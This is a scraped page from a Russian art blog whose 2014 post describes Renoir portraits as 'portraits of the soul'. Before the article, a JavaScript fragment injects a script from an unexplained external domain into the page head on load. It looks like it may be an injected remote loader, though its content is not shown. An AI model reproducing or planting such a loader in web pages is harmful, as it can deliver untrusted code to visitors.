, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
Пользовательский поиск

Добро пожаловать

Советую посмотреть

Страницы

Свежие комментарии

Обмен ссылками

Картины, портреты, критика живописи, Art-дилер




style="display:inline-block;width:120px;height:600px"
data-ad-client="ca-pub-5725625417417931"
data-ad-slot="8961029732">


« | Главная | »

Портрет души

Автор: Дмитрий Алмазов | 18 Мар 2014

Портрет душиПортрет души - это особый вид изобразительного искусства, где с помощью окрасок передается внутренне состояние человека. Портрет души - присутствует в каждом направлении живописи, но огромное множество "душевного портрета" можно увидеть в импрессионизме. Импрессионизм, как первое направление, открывшее данный жанр, смогло достичь эталона в " душевно-портретной технике". Основными представителями импрессионистов-портретистов являются: Пьер Огюст Ренуар, Оскар Клод Моне, Эдуард Мане и Камиль Писсарро. Но я вам предлагаю познакомиться с работами двух авторов, для которых портреты стали жизненным лейтмотивом. Это Пьер Огюст Ренуар и Оскар Клод Моне.

Начнем с Ренуара. На мой взгляд, вершиной творчество этого мастера является "Портрет Жанны Самари" или как его еще называют - "Мечтательность". На холсте больше внимание уделяется розовым, персиковым и зеленочайным тонам, которые помогают передать состояние французской актрисы. Плавные, не принужденные линии очерчивают бездонные (цвет глаз) глаза модели. Ее поза с легкой наивностью и детской инфантильностью заставляет зрителя почувствовать свой внутренний мир. Русые волосы добавляют в образ еще большей легкости и чистоты. "Мечтательность" - это жизнерадостный портрет души, который заставляет и нас почувствовать положительный прилив эмоций. Познакомиться с полотном можно в Государственном музее изобразительных искусств имени Пушкина.

Портрет души, Две сестрыДавайте познакомимся еще с одним портретом Ренуара. Портрет двух девушек в черном одеянии, сидящих на террасе. На холсте присутствует черные, бежевые, темно-синие, красные, зеленые, голубые, изумрудные, лазурные тона, которые уже передают не легкомысленный настрой, а уверенную оптимистическую позицию. На холсте мы видим двух сестер, которые находятся в ожидании грядущей поездке. Кстати, у картины двойное название: «Две сестры»; «На террасе». В полотне присутствуют мягкие, слегка округленные линии, выполненные в мазковой технике, помогают передать счастливое настроение модели. Узнать и почувствовать состояние двух сестер вы сможете Чикагском институте искусств.

Портрет душиПоследний портрет, с которым вы с вами познакомимся, это еще одна работа   Ренуара под названием «Клод Моне за чтением». Полотно выполнено в черных, глубоко-синих, темно-коричневых, белы, болотных тонах. На холсте изображен Клод Моне, который читает газету и курит трубку. Непринужденные лини заставляют нас понять, что главному герою картины, нет дела до окружающего мира. Ренуар смог застать своего друга за любимым делом, ведь, по мнению Моне, не было ничего важнее, чем прочтение свежей, утренней прессы. Данный портрет помогает нам узнать импрессиониста с новой стороны, про которую мы ничего не знали. Познакомиться с портретом друга  Ренуара вы сможете во французском музее Д' Орсэ.

Итак, портрет души - это вид изобразительного искусства, который остается актуальным по сей день и, на мой взгляд, будет актуален вечно.

Темы: Портрет, Художник, о Живописи | Ваш отзыв »

Отзывы

Перед отправкой формы:
Лаборатория Искусства работает на WordPress